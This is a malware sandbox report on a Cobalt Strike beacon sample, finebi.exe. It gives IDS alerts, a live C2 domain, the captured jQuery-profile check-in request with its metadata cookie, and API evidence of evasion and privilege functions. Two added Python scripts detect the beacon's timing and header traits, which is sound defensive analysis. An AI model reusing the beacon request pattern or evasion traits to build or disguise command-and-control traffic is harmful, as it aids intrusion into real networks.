
Windows Analysis Report
finebi.exe

Overview

General Information

Sample name: finebi.exe
Analysis ID: 1639429
MD5: ef0821209a3166e8142f5d170708b114
SHA1: 653b95b24480dd60982e95e19f15c736321cbade
SHA256: 47abbb7ad1ca5dea21674694dbe2dd59ebd4be8ce2fc15554c68574614f3d136
Tags: CobaltStrike, exe, user-kafan_shengui

Detection

Score: 68
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Contains functionality to detect sleep reduction / modifications
Joe Sandbox ML detected suspicious sample
Performs DNS queries to domains with low reputation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • finebi.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\finebi.exe" MD5: EF0821209A3166E8142F5D170708B114)
    • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Sigma rule match (Communication To Uncommon Destination Ports) on the Sysmon network-connection event (EventID 3) raised by the sample:
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\finebi.exe, Initiated: true, ProcessId: 7480, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49720
Timestamp                        SID      Severity  Classtype                                      Source IP     Source Port  Destination IP  Destination Port  Protocol
2025-03-15T15:56:06.960162+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:56:39.041066+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:56:51.417022+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:56:59.556492+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:57:07.481185+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:57:21.541100+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:57:31.902127+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:57:46.135115+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:57:57.212918+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:58:10.009853+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:58:20.525464+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:58:35.664234+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:58:42.822479+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:58:54.307172+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:59:05.715244+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
2025-03-15T15:59:13.246006+0100  2033009  1         Malware Command and Control Activity Detected  188.114.97.3  8080         192.168.2.5     49722             TCP
All sixteen alerts are the same rule (SID 2033009, the ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response signature) firing on the server's reply, which is why 188.114.97.3:8080 is listed as the source and the sandbox client 192.168.2.5:49722 as the destination.
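The alert timestamps are evenly spaced apart from one gap, which is the footprint of a beacon's sleep-plus-jitter loop. The following is an added example, not part of the Joe Sandbox report, that computes the gaps between the sixteen timestamps in the table and tests them for that periodicity. The timestamps are copied from the table; the 50% tolerance band, the 80% in-band threshold and the minimum of eight events are assumptions chosen for this illustration, not values from the report or from Cobalt Strike.

```python
from datetime import datetime
from statistics import median

# Timestamps copied from the SID 2033009 alert table in this report.
ALERT_TIMESTAMPS = [
    "2025-03-15T15:56:06.960162+0100",
    "2025-03-15T15:56:39.041066+0100",
    "2025-03-15T15:56:51.417022+0100",
    "2025-03-15T15:56:59.556492+0100",
    "2025-03-15T15:57:07.481185+0100",
    "2025-03-15T15:57:21.541100+0100",
    "2025-03-15T15:57:31.902127+0100",
    "2025-03-15T15:57:46.135115+0100",
    "2025-03-15T15:57:57.212918+0100",
    "2025-03-15T15:58:10.009853+0100",
    "2025-03-15T15:58:20.525464+0100",
    "2025-03-15T15:58:35.664234+0100",
    "2025-03-15T15:58:42.822479+0100",
    "2025-03-15T15:58:54.307172+0100",
    "2025-03-15T15:59:05.715244+0100",
    "2025-03-15T15:59:13.246006+0100",
]


def parse_ts(ts):
    """Parse Suricata's timestamp format: ISO-8601 with microseconds and a numeric offset."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def intervals(timestamps):
    """Seconds between consecutive alerts, after sorting them into time order."""
    times = sorted(parse_ts(t) for t in timestamps)
    return [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]


def beacon_profile(gaps, tolerance=0.5, min_events=8):
    """Periodicity heuristic; the thresholds are assumptions for this illustration.

    The median gap serves as the sleep estimate. Gaps within +/- tolerance of it
    are 'in band'; the largest relative deviation among them approximates the
    jitter. The series is called beaconing when at least 80% of the gaps are in band.
    """
    events = len(gaps) + 1
    if events < min_events:
        return {"events": events, "beaconing": False, "reason": "too few events"}
    sleep = median(gaps)
    low, high = sleep * (1 - tolerance), sleep * (1 + tolerance)
    in_band = [g for g in gaps if low <= g <= high]
    jitter = max(abs(g - sleep) / sleep for g in in_band) if in_band else None
    return {
        "events": events,
        "sleep_estimate_s": round(sleep, 3),
        "in_band": len(in_band),
        "out_of_band": len(gaps) - len(in_band),
        "jitter_estimate": None if jitter is None else round(jitter, 2),
        "beaconing": len(in_band) / len(gaps) >= 0.8,
    }


if __name__ == "__main__":
    print(beacon_profile(intervals(ALERT_TIMESTAMPS)))
```

On this data the median gap is about 11.4 s, 14 of the 15 gaps fall inside the band and the widest in-band deviation is roughly 37%; the lone 32 s gap at the start is consistent with a missed or merged alert rather than a change of sleep. Suricata fires once per server response, so what this measures is the check-in cadence as seen on the wire, not the configured sleep value itself.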

AV Detection

Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js | Avira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz/jquery-3.3.1.min.js | Avira URL Cloud: Label: malware
The report lists the first URL another seventeen times with trailing bytes appended (0ud, ., 11b87bd06, nsock, 0u, D, 0uL, ward-, -, 11b87bd06F, Um, 0ut, 0us, 0u4, ward, t, 11b87bd06d), each also labelled malware by Avira URL Cloud. Those are not separate URLs: the string extractor ran past the end of the URL in process memory (the same suffixes recur in the memory-dump strings further down), so the indicator set here is one host, apiapi.mmkinskfn.xyz, on ports 8080 and 80.
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.9% probability
Source: C:\Users\user\Desktop\finebi.exe | Code function: 0_2_00007FF75DAA9DC0 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext | 0_2_00007FF75DAA9DC0
Source: C:\Users\user\Desktop\finebi.exe | Code function: 0_2_00007FF75DAA1220 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,clock,clock,clock,clock,clock,clock | 0_2_00007FF75DAA1220
Source: C:\Users\user\Desktop\finebi.exe | Code function: 0_2_00007FF75DAB56A0 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom | 0_2_00007FF75DAB56A0
Source: C:\Users\user\Desktop\finebi.exe | Code function: 0_2_00007FF75DAA1390 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext | 0_2_00007FF75DAA1390
Source: finebi.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\finebi.exe | Code function: 0_2_00007FF75DA95F00 malloc,memset,strncmp,GetCurrentDirectoryA,strncat_s,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose | 0_2_00007FF75DA95F00
Source: C:\Users\user\Desktop\finebi.exe | Code function: 0_2_00007FF75DA96460 malloc,FindFirstFileA,free,malloc,malloc,free,free,FindNextFileA,FindClose | 0_2_00007FF75DA96460

Networking

Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 188.114.97.3:8080 -> 192.168.2.5:49722
Source: DNS query: apiapi.mmkinskfn.xyz
Source: global traffic | TCP traffic: 192.168.2.5:49720 -> 188.114.97.3:8080
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
The destination address belongs to Cloudflare (CLOUDFLARENET), so the team server sits behind Cloudflare's reverse proxy and the IP is shared infrastructure. That is what the "IP address seen in connection with other malware" and "Internet Provider seen in connection with other malware" signatures above reflect, and it means the IP is not a usable block indicator on its own; the hostname apiapi.mmkinskfn.xyz and the request pattern below are.
Source: global traffic | HTTP traffic detected (the same request, identical in every header, was captured 19 times in this block; it is the beacon's periodic check-in, and the cookie stays constant because it carries the session's encrypted beacon metadata rather than anything the server set):
GET /jquery-3.3.1.min.js HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: apiapi.mmkinskfn.xyz
Accept-Encoding: gzip, deflate
Cookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: Keep-Alive
Cache-Control: no-cache
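This request is the GET transaction of the public jQuery malleable C2 profile, and three things give it away at the header level. The Accept header is the one a browser sends for a page navigation, not for a script (Chrome sends */* when fetching a script element). The __cfduid cookie, which Cloudflare stopped issuing in 2021 and which was a short hexadecimal token while it existed, decodes from base64url to exactly 128 bytes, the size of an RSA-1024 ciphertext, which is how Beacon ships its metadata to the team server on every check-in. And "Connection: Keep-Alive" is WinINet's capitalisation (the sample's own HttpOpenRequestA/HttpSendRequestA chain appears below), whereas Chrome sends keep-alive. The following added example, which is not code from the report or from any detection product, parses the captured request and applies those checks; KNOWN_JQUERY_HOSTS and the three-finding threshold are illustrative assumptions.

```python
import base64
import binascii

# The captured check-in from the report above, with the header lines restored.
CAPTURED_REQUEST = (
    "GET /jquery-3.3.1.min.js HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    "Host: apiapi.mmkinskfn.xyz\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Cookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V"
    "_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1w"
    "smC_OVcZKFw\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# Hosts from which a page legitimately loads jquery-*.min.js. Illustrative, an assumption:
# a real deployment would use its own allow-list.
KNOWN_JQUERY_HOSTS = {"code.jquery.com", "ajax.googleapis.com", "cdnjs.cloudflare.com", "cdn.jsdelivr.net"}

# Size in bytes of an RSA-1024 ciphertext, which is what Beacon's encrypted metadata is.
RSA1024_CIPHERTEXT_LEN = 128


def parse_request(raw):
    """Split a raw HTTP/1.1 request into request line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def parse_cookies(cookie_header):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def decode_urlsafe_b64(value):
    """Re-pad and decode a base64url blob; None if it cannot be decoded."""
    try:
        return base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
    except (binascii.Error, ValueError):
        return None


def assess(raw):
    """Apply the header-level checks described above and return the findings."""
    req = parse_request(raw)
    h = req["headers"]
    findings = []
    path = req["target"].split("?", 1)[0]
    host = h.get("host", "").split(":")[0].lower()

    if path.startswith("/jquery-") and path.endswith(".min.js") and host not in KNOWN_JQUERY_HOSTS:
        findings.append("jquery-style path requested from a host outside the jQuery CDN allow-list")
    if "text/html" in h.get("accept", ""):
        findings.append("document-navigation Accept header on a script fetch")

    cookie_bytes = None
    cookies = parse_cookies(h.get("cookie", ""))
    blob = decode_urlsafe_b64(cookies["__cfduid"]) if "__cfduid" in cookies else None
    if blob is not None:
        cookie_bytes = len(blob)
        if cookie_bytes == RSA1024_CIPHERTEXT_LEN:
            findings.append("__cfduid decodes to exactly 128 bytes, the RSA-1024 ciphertext size of beacon metadata")

    if h.get("connection") == "Keep-Alive" and "Chrome/" in h.get("user-agent", ""):
        findings.append("WinINet-style 'Keep-Alive' capitalisation under a Chrome User-Agent")

    return {"host": host, "path": path, "cookie_bytes": cookie_bytes,
            "findings": findings, "suspicious": len(findings) >= 3}


if __name__ == "__main__":
    for line in assess(CAPTURED_REQUEST)["findings"]:
        print("-", line)
```

The cookie-length check is the one worth keeping even when an operator changes the profile's URI and User-Agent: whatever transform the profile applies, the metadata underneath is still a 128-byte RSA-1024 ciphertext, so any cookie or header value that decodes to exactly that length from a client that otherwise claims to be a browser deserves a second look.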
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\finebi.exe | Code function: 0_2_00007FF75DA9D0F0 memset,HttpOpenRequestA,HttpSendRequestA,InternetCloseHandle,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,InternetCloseHandle | 0_2_00007FF75DA9D0F0
Source: global traffic | HTTP traffic detected: 19 further captures of the same GET /jquery-3.3.1.min.js request to apiapi.mmkinskfn.xyz, identical in every header and in the __cfduid cookie value to the request shown above.
Source: global traffic | DNS traffic detected: DNS query: apiapi.mmkinskfn.xyz
Source: finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1515959738.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6815000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js-
Source: finebi.exe, 00000000.00000002.3098831995.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.3058585670.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js.
Source: finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0u
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2426098486.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0u4
Source: finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1515959738.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6815000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0uL
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2426098486.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0ud
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2426098486.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0us
Source: finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0ut
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2983134812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06
Source: finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2045132812.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06F
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06d
Source: finebi.exe, 00000000.00000003.1800801093.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1640034764.000001D8B6815000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1723643625.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsD
Source: finebi.exe, 00000000.00000002.3098831995.000001D8B67AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsUm
Source: finebi.exe, 00000000.00000003.1515959738.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsnsock
Source: finebi.exe, 00000000.00000003.2297776973.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2187493629.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jst
Source: finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1941361657.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.1639877754.000001D8B6813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsward
Source: finebi.exe, 00000000.00000003.2682215947.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2868908810.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2756261866.000001D8B6816000.00000004.00000020.00020000.00000000.sdmp, finebi.exe, 00000000.00000003.2531253955.000001D8B6816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsward-
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA9F110 GetStartupInfoA, GetCurrentDirectoryW, GetCurrentDirectoryW, CreateProcessWithLogonW, GetLastError
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA95890
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA95500
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAB66F0
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA98EE0
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA9E5C0
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA97E10
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAA40A0
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA94720
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAA3250
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAA3A90
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAA34C0
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAB4CA0
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA94CF0
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAA93F0
Source: C:\Users\user\Desktop\finebi.exe: Code function: String function: 00007FF75DAA8CB0 appears 243 times
Source: finebi.exe: Binary or memory string: OriginalFilename vs finebi.exe
Source: classification engine: Classification label: mal68.troj.evad.winEXE@2/0@1/1
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DAA06B0 LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError
Source: C:\Users\user\Desktop\finebi.exe: Code function: 0_2_00007FF75DA9EDD0 memset, GetCurrentProcess, CreateToolhelp32Snapshot, Process32FirstW, OpenProcess, OpenProcessToken, CloseHandle, ProcessIdToSessionId, CloseHandle, Process32NextW, CloseHandle, CloseHandle
Source: C:\Windows\System32\conhost.exe: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: finebi.exe: Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\finebi.exe: Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown: Process created: C:\Users\user\Desktop\finebi.exe "C:\Users\user\Desktop\finebi.exe"
Source: C:\Users\user\Desktop\finebi.exe: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: wininet.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: wldp.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: profapi.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\finebi.exe: Section loaded: winnsi.dll
